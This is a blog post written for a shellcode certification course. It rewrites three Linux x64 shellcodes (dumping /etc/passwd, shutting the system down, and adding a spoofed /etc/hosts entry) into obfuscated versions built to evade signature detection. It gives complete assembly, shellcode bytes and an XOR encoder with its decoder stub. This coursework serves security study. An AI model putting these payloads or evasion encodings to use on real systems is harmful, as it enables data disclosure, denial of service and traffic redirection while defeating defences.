After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.
While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature based matching to recognise threats. A limitation of the assignment is to stay within 150% of the original payload size.
Dump Password Payload
As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.
The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:
BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start
section .text
_start:
jmp _push_filename
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
; syscall exit
xor rax, rax
add al, 60
syscall
_push_filename:
call _readfile
path: db "/etc/passwdA"
The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into a hex number and pushing it onto the stack. This involves reversing the string and breaking it into 8 byte chunks. Note that we can’t use a NULL terminator on the string, so we’ll use a value of 0x1 and fix it afterwards.
push 0x01647773 ; 0x01 + dws
mov rbx, 0x7361702f6374652f ; sap/cte/
push rbx
mov rdi, rsp ; Get address of path string
dec byte [rdi+11] ; NULL byte fix
This change saves 2 bytes and transforms the raw strings visible in the shellcode.
The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:
push 2
sub rsi, rsi ; set O_RDONLY flag
pop rax
syscall
The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4096 decimal) bytes which is allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by swapping in known zero values instead of XORing and use a subtract operation to hide the 0xfff value.
push rax ; Save file handle
xchg rsi, rax ; Zero out RAX
push rax
pop rdx
pop rdi
sub dx, 0xf001
sub rsp, rdx ; Make room on the stack
lea rsi, [rsp] ; Pass the buffer address
syscall
These changes save a further 4 bytes.
The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:
push 1
pop rdx
xchg rax, rdx ; syscall id and read size
push rax
pop rdi ; fd id
syscall
The last section is a simple SYS_EXIT, all we can do here is try to save some bytes:
push 60
pop rax
syscall
Putting the whole thing together gives us pw_dump.nasm:
push 0x01647773
mov rbx, 0x7361702f6374652f
push rbx
mov rdi, rsp ; Get addr of path string
dec byte [rdi+11] ; NULL byte fix
push 2
sub rsi, rsi ; set O_RDONLY flag
pop rax
syscall ; sys_open
push rax ; Save file handle
xchg rsi, rax ; Zero out RAX
push rax
pop rdx
pop rdi ; File ID
sub dx, 0xf001
sub rsp, rdx ; Make room on the stack
lea rsi, [rsp] ; Pass the buffer address
syscall ; sys_read
push 1
pop rdx
xchg rax, rdx ; syscall id and read size
push rax
pop rdi ; STDOUT (1)
syscall ; sys_write
push 60
pop rax
syscall ; sys_exit
Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:
"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
"\x3c\x58\x0f\x05"
Shutdown
The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.
; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
xor rax, rax
xor rdx, rdx
push rax
push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp
push rax
push word 0x682d ;-h
mov rcx, rsp
push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp
push rdx
push rbx
push rcx
push rdi
mov rsi, rsp
add rax, 59
syscall
There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.
The code is an execve call to the system’s shutdown command. At the start the RAX and RDX registers are cleared. Looking through the code, RDX isn’t used until the end where becomes a syscall parameter while RAX is used to push zeros onto the stack until the syscall at the end. This seems wasteful so we’ll just clear RDX for zero pushes and worry about RAX later.
_start:
xor rdx, rdx
push rdx
The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.
The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first item.
The original code pushes hexadecimal values to build the strings. I decided to use NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.
...
push dword 0xffffffffff889091 ; inverse of 'now\x00'
not qword [rsp]
push rsp
pop rbx
...
A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.
First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:
jmp _str ; Get addr of strings in RAX
_build:
pop rax
...
_str:
call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h: db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:
push rax ; 'now'
lea rdi, [rax+4] ; '-h'
push rdi
lea rdi, [rax+7] ; '/sbin/shutdown'
push rdi
push rsp ; Save arg array addr
pop rsi
Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.
The strings are still mangled, but we can run the NOT loop over the original data location using the value in RAX:
push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode
Now RDI and RSI point to decoded strings, RDX was cleared at the start, all that remains is to trigger the syscall:
push 0x3b
pop rax
syscall
The complete listing of shutdown.nasm is pretty compact:
global _start
section .TEXT exec write
_start:
xor rdx, rdx
push rdx ; NULL to terminate arg array
jmp _str ; Get addr of strings in RAX
_build:
pop rax
; Load string addresses onto stack
push rax ; 'now'
lea rdi, [rax+4] ; '-h'
push rdi
lea rdi, [rax+7] ; '/sbin/shutdown'
push rdi
push rsp ; Save arg array addr
pop rsi
; Decode strings
push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode
push 0x3b
pop rax
syscall
_str:
call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h: db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
Shellcode Extraction results in a 62 byte string, just squeezing under the original and alternative implementations.
"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78"
"\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16"
"\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58"
"\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff"
"\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97"
"\x8a\x8b\x9b\x90\x88\x91\xff";
Add Host Mapping
For the last example I decided to try another file based example: Add map in /etc/hosts file also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoof mapping to the /etc/hosts file allowing redirection of network traffic.
; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
section .text
_start:
;open
xor rax, rax
add rax, 2 ; open syscall
xor rdi, rdi
xor rsi, rsi
push rsi ; 0x00
mov r8, 0x2f2f2f2f6374652f ; stsoh/
mov r10, 0x7374736f682f2f2f ; /cte/
push r10
push r8
add rdi, rsp
xor rsi, rsi
add si, 0x401
syscall
;write
xchg rax, rdi
xor rax, rax
add rax, 1 ; syscall for write
jmp data
write:
pop rsi
mov dl, 19 ; length in rdx
syscall
;close
xor rax, rax
add rax, 3
syscall
;exit
xor rax, rax
mov al, 60
xor rdi, rdi
syscall
data:
call write
text db '127.1.1.1 google.lk'
For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, because 64 bit CALLs are minimum of 4 bytes, they introduce zeros into the shellcode. This is normally handled by jumping backwards, but in this example we’ll try something else.
In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:
; open
xor rsi, rsi
add si, 0x401 ; read/write and append flags
call _jump1
db '/etc/hosts', 0x00
_jump1:
pop rdi ; path reference
push 2
pop rax
syscall
However, the disassembly shows the zeros introduces by the CALL instruction:
0000000000600078 <_start>:
600078: 48 31 f6 xor rsi,rsi
60007b: 66 81 c6 01 04 add si,0x401
600080: e8 0b 00 00 00 call 600090 <_jump1>
600085: 2f 65 74 63 ... (bad)
...
0000000000600090 <_jump1>:
600090: 5f pop rdi
600091: 6a 02 push 0x2
600093: 58 pop rax
600094: 0f 05 syscall
To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.
The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.
The final pre-encoding version is addhost_pre_encode.nasm
_start:
; open
xor rsi, rsi
add si, 0x401 ; read/write and append flags
call _jump1
db '/etc/hosts', 0x00
_jump1:
pop rdi ; path reference
push 2
pop rax
syscall
; write
xchg rax, rdi
push 1
pop rax ; syscall for write
call _jump2
db '127.1.1.1 google.lk', 0xa
_jump2:
pop rsi
push 20 ; data length in rdx
pop rdx
syscall
;close
push 3
pop rax
syscall
;exit
push 60
pop rax
syscall
The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes to write the decoder stub.
A simple one byte XOR encoding of the shellcode requires a few lines of Python:
MBP:slae64$ python
Python 2.7.3 (default, Oct 26 2016, 21:01:49)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ...
>>> for b in payload:
... sys.stdout.write(hex(b ^ 0x41) + ',')
...
0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,
0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,
0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,
0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44,
>>>
The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data.
_start:
jmp _code_marker ; Get the payload address
_decode:
pop rax
push 76 ; Decode
pop rcx
_decode_loop:
xor byte [rax], 0x41
inc rax
loop _decode_loop
jmp _payload ; Jump to decoded payload
_code_marker:
call _decode
_payload:
db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
db 0x44,0x2b,0x7d,0x19,0x4e,0x44
There is a little bit of faff with labels on the payload, we must jump over the call _decode instruction to the _payload marker after the decode loop completes or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.
This completes the addhost.nasm code. The final size of the shell code is 97 bytes, well under the original, even with added content obfuscation.
We can test the operation of the shellcode using strace to confirm the syscalls:
MBP:slae64$ strace ./addhost
execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0
open("/etc/hosts", O_WRONLY|O_APPEND) = 3
write(3, "127.1.1.1 google.lk\n", 20) = 20
close(3) = 0
_exit(3) = ?
MBP:slae64$
Conclusion
I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE64-1471